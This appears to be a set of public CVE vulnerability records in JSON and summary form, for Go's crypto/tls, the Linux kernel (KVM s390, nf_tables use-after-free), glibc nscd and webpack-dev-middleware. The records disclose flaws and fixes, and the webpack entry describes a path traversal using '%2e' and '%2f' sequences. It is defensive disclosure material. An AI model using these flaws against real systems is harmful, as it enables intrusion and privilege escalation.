{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:21:15.309Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/20654" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/326012/26" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-announce/c/QMK8IQALDvA" }, { "tags": [ "x_transferred" ], "url": "https://people.redhat.com/~hkario/marvin/" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2023-2375" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240112-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "crypto/tls", "product": "crypto/tls", "programRoutines": [ { "name": "rsaKeyAgreement.processClientKeyExchange" }, { "name": "rsaKeyAgreement.generateClientKeyExchange" }, { "name": "Conn.Handshake" }, { "name": "Conn.HandshakeContext" }, { "name": "Conn.Read" }, { "name": "Conn.Write" }, { "name": "Dial" }, { "name": "DialWithDialer" }, { "name": "Dialer.Dial" }, { "name": "Dialer.DialContext" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.20.0", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "value": "Before Go 1.20, the RSA based TLS key exchanges used the math/big library, which is not constant time. RSA blinding was applied to prevent timing attacks, but analysis shows this may not have been fully effective. In particular it appears as if the removal of PKCS#1 padding may leak timing information, which in turn could be used to recover session key bits. In Go 1.20, the crypto/tls library switched to a fully constant time RSA implementation, which we do not believe exhibits any timing side channels." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-208: Observable Timing Discrepancy", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-05T16:18:06.104Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/20654" }, { "url": "https://go.dev/cl/326012/26" }, { "url": "https://groups.google.com/g/golang-announce/c/QMK8IQALDvA" }, { "url": "https://people.redhat.com/~hkario/marvin/" }, { "url": "https://pkg.go.dev/vuln/GO-2023-2375" }, { "url": "https://security.netapp.com/advisory/ntap-20240112-0005/" } ], "title": "Before Go 1.20, the RSA based key exchange methods in crypto/tls may exhibit a timing side channel" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2023-45287", "datePublished": "2023-12-05T16:18:06.104Z", "dateReserved": "2023-10-06T17:06:26.221Z", "dateUpdated": "2024-08-02T20:21:15.309Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52597
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2024-12-19 08:22
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: fix setting of fpc register
kvm_arch_vcpu_ioctl_set_fpu() allows to set the floating point control
(fpc) register of a guest cpu. The new value is tested for validity by
temporarily loading it into the fpc register.
This may lead to corruption of the fpc register of the host process:
if an interrupt happens while the value is temporarily loaded into the fpc
register, and within interrupt context floating point or vector registers
are used, the current fp/vx registers are saved with save_fpu_regs()
assuming they belong to user space and will be loaded into fp/vx registers
when returning to user space.
test_fp_ctl() restores the original user space / host process fpc register
value, however it will be discarded, when returning to user space.
In result the host process will incorrectly continue to run with the value
that was supposed to be used for a guest cpu.
Fix this by simply removing the test. There is another test right before
the SIE context is entered which will handles invalid values.
This results in a change of behaviour: invalid values will now be accepted
instead of that the ioctl fails with -EINVAL. This seems to be acceptable,
given that this interface is most likely not used anymore, and this is in
addition the same behaviour implemented with the memory mapped interface
(replace invalid values with zero) - see sync_regs() in kvm-s390.c.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 4, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-52597", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T15:59:20.673242Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-noinfo Not enough information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-07T17:29:59.971Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:21.131Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/3a04410b0bc7e056e0843ac598825dd359246d18" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/5e63c9ae8055109d805aacdaf2a4fe2c3b371ba1" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/150a3a3871490e8c454ffbac2e60abeafcecff99" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/732a3bea7aba5b15026ea42d14953c3425cc7dc2" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/0671f42a9c1084db10d68ac347d08dbf6689ecb3" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/c87d7d910775a025e230fd6359b60627e392460f" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/2823db0010c400e4b2b12d02aa5d0d3ecb15d7c7" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/b988b1bb0053c0dcd26187d29ef07566a565cf55" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "arch/s390/kvm/kvm-s390.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "3a04410b0bc7e056e0843ac598825dd359246d18", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "5e63c9ae8055109d805aacdaf2a4fe2c3b371ba1", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "150a3a3871490e8c454ffbac2e60abeafcecff99", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "732a3bea7aba5b15026ea42d14953c3425cc7dc2", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "0671f42a9c1084db10d68ac347d08dbf6689ecb3", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "c87d7d910775a025e230fd6359b60627e392460f", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "2823db0010c400e4b2b12d02aa5d0d3ecb15d7c7", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "b988b1bb0053c0dcd26187d29ef07566a565cf55", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "arch/s390/kvm/kvm-s390.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "4.19.*", "status": "unaffected", "version": "4.19.307", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.269", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.210", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.149", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.77", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.16", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.4", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: s390: fix setting of fpc register\n\nkvm_arch_vcpu_ioctl_set_fpu() allows to set the floating point control\n(fpc) register of a guest cpu. The new value is tested for validity by\ntemporarily loading it into the fpc register.\n\nThis may lead to corruption of the fpc register of the host process:\nif an interrupt happens while the value is temporarily loaded into the fpc\nregister, and within interrupt context floating point or vector registers\nare used, the current fp/vx registers are saved with save_fpu_regs()\nassuming they belong to user space and will be loaded into fp/vx registers\nwhen returning to user space.\n\ntest_fp_ctl() restores the original user space / host process fpc register\nvalue, however it will be discarded, when returning to user space.\n\nIn result the host process will incorrectly continue to run with the value\nthat was supposed to be used for a guest cpu.\n\nFix this by simply removing the test. There is another test right before\nthe SIE context is entered which will handles invalid values.\n\nThis results in a change of behaviour: invalid values will now be accepted\ninstead of that the ioctl fails with -EINVAL. This seems to be acceptable,\ngiven that this interface is most likely not used anymore, and this is in\naddition the same behaviour implemented with the memory mapped interface\n(replace invalid values with zero) - see sync_regs() in kvm-s390.c." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:22:19.530Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/3a04410b0bc7e056e0843ac598825dd359246d18" }, { "url": "https://git.kernel.org/stable/c/5e63c9ae8055109d805aacdaf2a4fe2c3b371ba1" }, { "url": "https://git.kernel.org/stable/c/150a3a3871490e8c454ffbac2e60abeafcecff99" }, { "url": "https://git.kernel.org/stable/c/732a3bea7aba5b15026ea42d14953c3425cc7dc2" }, { "url": "https://git.kernel.org/stable/c/0671f42a9c1084db10d68ac347d08dbf6689ecb3" }, { "url": "https://git.kernel.org/stable/c/c87d7d910775a025e230fd6359b60627e392460f" }, { "url": "https://git.kernel.org/stable/c/2823db0010c400e4b2b12d02aa5d0d3ecb15d7c7" }, { "url": "https://git.kernel.org/stable/c/b988b1bb0053c0dcd26187d29ef07566a565cf55" } ], "title": "KVM: s390: fix setting of fpc register", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52597", "datePublished": "2024-03-06T06:45:26.608Z", "dateReserved": "2024-03-02T21:55:42.572Z", "dateUpdated": "2024-12-19T08:22:19.530Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-1086
Vulnerability from cvelistv5
Published
2024-01-31 12:14
Modified
2024-08-01 18:26
Severity ?
EPSS score ?
Summary
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.
We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.
References
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:o:linux:linux_kernel:3.15:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "linux_kernel", "vendor": "linux", "versions": [ { "lessThan": "6.8", "status": "affected", "version": "3.15", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-1086", "options": [ { "Exploitation": "active" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-06-13T14:20:47.271139Z", "version": "2.0.3" }, "type": "ssvc" } }, { "other": { "content": { "dateAdded": "2024-05-30", "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-1086" }, "type": "kev" } } ], "providerMetadata": { "dateUpdated": "2024-06-13T14:20:53.447Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T18:26:30.467Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/Notselwyn/CVE-2024-1086" }, { "tags": [ "x_transferred" ], "url": "https://news.ycombinator.com/item?id=39828424" }, { "tags": [ "x_transferred" ], "url": "https://pwning.tech/nftables/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/15/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/23" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/22" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/14/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/17/5" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240614-0009/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.8", "status": "affected", "version": "3.15", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Notselwyn" } ], "datePublic": "2024-01-24T19:02:39+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-31T12:14:34.073Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" }, { "url": "https://github.com/Notselwyn/CVE-2024-1086" }, { "url": "https://news.ycombinator.com/item?id=39828424" }, { "url": "https://pwning.tech/nftables/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/15/2" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/10/23" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/10/22" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/14/1" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/17/5" }, { "url": "https://security.netapp.com/advisory/ntap-20240614-0009/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2024-1086", "datePublished": "2024-01-31T12:14:34.073Z", "dateReserved": "2024-01-30T20:04:09.704Z", "dateUpdated": "2024-08-01T18:26:30.467Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-1085
Vulnerability from cvelistv5
Published
2024-01-31 12:14
Modified
2024-08-01 18:26
Severity ?
EPSS score ?
Summary
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
The nft_setelem_catchall_deactivate() function checks whether the catch-all set element is active in the current generation instead of the next generation before freeing it, but only flags it inactive in the next generation, making it possible to free the element multiple times, leading to a double free vulnerability.
We recommend upgrading past commit b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T18:26:30.459Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.8", "status": "affected", "version": "5.13", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Lonial Con" } ], "datePublic": "2024-01-17T11:02:49+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_setelem_catchall_deactivate() function checks whether the catch-all set element is active in the current generation instead of the next generation before freeing it, but only flags it inactive in the next generation, making it possible to free the element multiple times, leading to a double free vulnerability.\n\nWe recommend upgrading past commit b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-31T12:14:32.429Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7" }, { "url": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2024-1085", "datePublished": "2024-01-31T12:14:32.429Z", "dateReserved": "2024-01-30T20:04:08.623Z", "dateUpdated": "2024-08-01T18:26:30.459Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-33602
Vulnerability from cvelistv5
Published
2024-05-06 19:22
Modified
2024-08-02 02:36
Severity ?
EPSS score ?
Summary
nscd: netgroup cache assumes NSS callback uses in-buffer strings
The Name Service Cache Daemon's (nscd) netgroup cache can corrupt memory
when the NSS callback does not store all strings in the provided buffer.
The flaw was introduced in glibc 2.15 when the cache was added to nscd.
This vulnerability is only present in the nscd binary.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The GNU C Library | glibc |
Version: 2.15 < 2.40 |
|
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:gnu:glibc:2.15:*:*:*:*:*:*:*" ], "defaultStatus": "unaffected", "product": "glibc", "vendor": "gnu", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.15", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-33602", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-06-13T16:09:29.755117Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-13T16:26:29.854Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T02:36:04.479Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0008" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240524-0012/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "glibc", "vendor": "The GNU C Library", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.15", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cdiv\u003enscd: netgroup cache assumes NSS callback uses in-buffer strings\u003cbr\u003e\u003cbr\u003eThe Name Service Cache Daemon\u0027s (nscd) netgroup cache can corrupt memory\u003cbr\u003ewhen the NSS callback does not store all strings in the provided buffer.\u003cbr\u003eThe flaw was introduced in glibc 2.15 when the cache was added to nscd.\u003cbr\u003e\u003cbr\u003eThis vulnerability is only present in the nscd binary.\u003c/div\u003e" } ], "value": "nscd: netgroup cache assumes NSS callback uses in-buffer strings\n\nThe Name Service Cache Daemon\u0027s (nscd) netgroup cache can corrupt memory\nwhen the NSS callback does not store all strings in the provided buffer.\nThe flaw was introduced in glibc 2.15 when the cache was added to nscd.\n\nThis vulnerability is only present in the nscd binary.\n\n" } ], "impacts": [ { "capecId": "CAPEC-129", "descriptions": [ { "lang": "en", "value": "CAPEC-129 Pointer Manipulation" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-466", "description": "CWE-466 Return of Pointer Value Outside of Expected Range", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-06T19:22:12.383Z", "orgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "shortName": "glibc" }, "references": [ { "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0008" }, { "url": "https://security.netapp.com/advisory/ntap-20240524-0012/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "source": { "discovery": "UNKNOWN" }, "title": "nscd: netgroup cache assumes NSS callback uses in-buffer strings", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "assignerShortName": "glibc", "cveId": "CVE-2024-33602", "datePublished": "2024-05-06T19:22:12.383Z", "dateReserved": "2024-04-24T20:35:08.340Z", "dateUpdated": "2024-08-02T02:36:04.479Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-29180
Vulnerability from cvelistv5
Published
2024-03-21 16:47
Modified
2024-08-02 14:58
Severity ?
EPSS score ?
Summary
Prior to versions 7.1.0, 6.1.2, and 5.3.4, the webpack-dev-middleware development middleware for devpack does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine. The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory `memfs` filesystem. If `writeToDisk` configuration option is set to `true`, the physical filesystem is used. The `getFilenameFromUrl` method is used to parse URL and build the local file path. The public path prefix is stripped from the URL, and the `unsecaped` path suffix is appended to the `outputPath`. As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use `%2e` and `%2f` sequences to perform path traversal attack.
Developers using `webpack-dev-server` or `webpack-dev-middleware` are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content. If the development server is listening on a public IP address (or `0.0.0.0`), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port). If the server allows access from third-party domains, an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files. Starting with fixed versions 7.1.0, 6.1.2, and 5.3.4, the URL is unescaped and normalized before any further processing.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | webpack | webpack-dev-middleware |
Version: >= 7.0.0, < 7.1.0 Version: >= 6.0.0, < 6.1.2 Version: < 5.3.4 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T01:10:54.074Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6", "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6" }, { "name": "https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132" }, { "name": "https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353" }, { "name": "https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e" }, { "name": "https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": 